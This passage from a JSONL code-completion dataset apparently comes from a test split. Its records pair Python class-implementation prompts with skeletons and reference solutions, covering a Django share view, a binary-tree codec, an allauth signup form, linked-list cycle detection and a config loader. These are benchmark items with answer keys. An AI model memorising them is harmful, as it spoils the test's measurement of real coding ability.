self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000393", "length_bytes": 2685, "license_type": "permissive", "methods": [{"docstring": "Store workflow and 'request.user' in kwargs", "name": "get_form_kwargs", "signature": "def get_form_kwargs(self) -> Dict"}, {"docstring": "Store the new shared user", "name": "form_valid", "signature": "def form_valid(self, form) -> http.JsonResponse"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002463", "prompt": "Implement the Python class `WorkflowShareCreateView` described below.\n\nClass description:\nView to create a new \"share\" user in the workflow.\n\nMethod signatures and docstrings:\n- def get_form_kwargs(self) -> Dict: Store workflow and 'request.user' in kwargs\n- def form_valid(self, form) -> http.JsonResponse: Store the new shared user", "prompted_full_text": "Implement the Python class `WorkflowShareCreateView` described below.\n\nClass description:\nView to create a new \"share\" user in the workflow.\n\nMethod signatures and docstrings:\n- def get_form_kwargs(self) -> Dict: Store workflow and 'request.user' in kwargs\n- def form_valid(self, form) -> http.JsonResponse: Store the new shared user\n\n<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n<|end_body_0|>\n\n<|body_start_1|>\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n<|end_body_1|>\n", "revision_id": "c432745dfff932cbe7397100422d49df78f0a882", "skeleton": "<|skeleton|>\nclass WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n <|body_0|>\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkflowShareCreateView:\n \"\"\"View to create a new \"share\" user in the workflow.\"\"\"\n\n def get_form_kwargs(self) -> Dict:\n \"\"\"Store workflow and 'request.user' in kwargs\"\"\"\n form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n", "source": "the_stack_v2_python_sparse", "source_path": "ontask/workflow/views/share.py", "source_repo": "abelardopardo/ontask_b", "split": "test", "star_events_count": 43} {"blob_id": "5884eb3002f49bc3129b14e6eba27b0794c924ae", "bodies": ["ans = ''\nstack = [root]\nwhile stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\nreturn ans", "def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\nreturn parse(0)[0]"], "bodies_text": "<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000394", "length_bytes": 1395, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n<|end_body_1|>\n", "revision_id": "43a5e436b6ec8950c6952554329ae0314430afea", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "problems/serialize_and_deserialize_binary_tree/solution.py", "source_repo": "dengl11/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "fc32afcc9b211ae3281ea224e46296a23c77590b", "bodies": ["logger.debug('Args: %s; kwargs: %s', args, kwargs)\nself.helper = FormHelper()\nself.helper.form_id = 'signup_form'\nself.helper.form_class = 'signup'\nself.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n

You must select at least one tag. These tags\\n control which job postings will be shown to you and which\\n will not. Only those jobs that match these tags will be\\n visible to you. This can be changed later.

\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\nsuper(CustomSignupForm, self).__init__(*args, **kwargs)", "tags = self.cleaned_data['tags']\nlogger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\nuser.profile.tags.add(*self.cleaned_data['tags'])\nuser.profile.save()\ncreate_userjobs_for(user)"], "bodies_text": "<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n

You must select at least one tag. These tags\\n control which job postings will be shown to you and which\\n will not. Only those jobs that match these tags will be\\n visible to you. This can be changed later.

\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "class_docstring": "Customize django-allauth SignupForm to include tags.", "class_name": "CustomSignupForm", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n

You must select at least one tag. These tags\\n control which job postings will be shown to you and which\\n will not. Only those jobs that match these tags will be\\n visible to you. This can be changed later.

\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000395", "length_bytes": 2749, "license_type": "permissive", "methods": [{"docstring": "Create a pretty crispy form.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Provide custom signup step (saving tags).", "name": "signup", "signature": "def signup(self, request, user)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004128", "prompt": "Implement the Python class `CustomSignupForm` described below.\n\nClass description:\nCustomize django-allauth SignupForm to include tags.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Create a pretty crispy form.\n- def signup(self, request, user): Provide custom signup step (saving tags).", "prompted_full_text": "Implement the Python class `CustomSignupForm` described below.\n\nClass description:\nCustomize django-allauth SignupForm to include tags.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Create a pretty crispy form.\n- def signup(self, request, user): Provide custom signup step (saving tags).\n\n<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n

You must select at least one tag. These tags\\n control which job postings will be shown to you and which\\n will not. Only those jobs that match these tags will be\\n visible to you. This can be changed later.

\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "revision_id": "7882aa8ed42afe689e594a3e10c9fc6369f70bf5", "skeleton": "<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n

You must select at least one tag. These tags\\n control which job postings will be shown to you and which\\n will not. Only those jobs that match these tags will be\\n visible to you. This can be changed later.

\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n", "source": "the_stack_v2_python_sparse", "source_path": "freelancefinder/users/forms.py", "source_repo": "simo97/freelancefinder", "split": "test", "star_events_count": 0} {"blob_id": "f9afb11fbf9d6e40bc440919c405d93abd8ef0fa", "bodies": ["fast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\nreturn False", "if not head:\n return False\nif not head.next:\n return False\nnode_set = set()\ncurrent = head\nwhile current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\nreturn False", "if not (head and head.next):\n return\nnode_set = set()\ncurrent = head\nwhile current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\nreturn", "if not (head and head.next):\n return\nfast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\nif not fast or not fast.next:\n return\nmeet_point = slow\nfast = head\nwhile fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\nreturn meet_point", "if head is None or head.next is None:\n return\nfast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\nreturn"], "bodies_text": "<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000396", "length_bytes": 2526, "license_type": "no_license", "methods": [{"docstring": ":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针", "name": "hasCycle", "signature": "def hasCycle(self, head)"}, {"docstring": ":type head: ListNode :rtype: bool", "name": "hasCycle1", "signature": "def hasCycle1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle", "signature": "def detectCycle(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle1", "signature": "def detectCycle1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle2", "signature": "def detectCycle2(self, head)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004655", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def hasCycle(self, head): :type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\n- def hasCycle1(self, head): :type head: ListNode :rtype: bool\n- def detectCycle(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle1(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle2(self, head): :type head: ListNode :rtype: ListNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def hasCycle(self, head): :type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\n- def hasCycle1(self, head): :type head: ListNode :rtype: bool\n- def detectCycle(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle1(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle2(self, head): :type head: ListNode :rtype: ListNode\n\n<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "revision_id": "11ad9d3841de09c0b4dc3a667e7e63c3558656a5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "link_list_cycle.py", "source_repo": "ganlanshu/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "7afb26e3e36c78a81fa66fe49253244b4f0bac3b", "bodies": ["config = ConfigParser.ConfigParser()\nconfig.read(cfg)\nfor section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)", "try:\n return getattr(self, section)\nexcept AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))"], "bodies_text": "<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Config", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000397", "length_bytes": 1928, "license_type": "permissive", "methods": [{"docstring": "@param file_name: file name without extension. @param cfg: configuration file path.", "name": "__init__", "signature": "def __init__(self, cfg='config.conf')"}, {"docstring": "Get option. @param section: section to fetch. @return: option value.", "name": "get", "signature": "def get(self, section)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006333", "prompt": "Implement the Python class `Config` described below.\n\nClass description:\nImplement the Config class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg='config.conf'): @param file_name: file name without extension. @param cfg: configuration file path.\n- def get(self, section): Get option. @param section: section to fetch. @return: option value.", "prompted_full_text": "Implement the Python class `Config` described below.\n\nClass description:\nImplement the Config class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg='config.conf'): @param file_name: file name without extension. @param cfg: configuration file path.\n- def get(self, section): Get option. @param section: section to fetch. @return: option value.\n\n<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "revision_id": 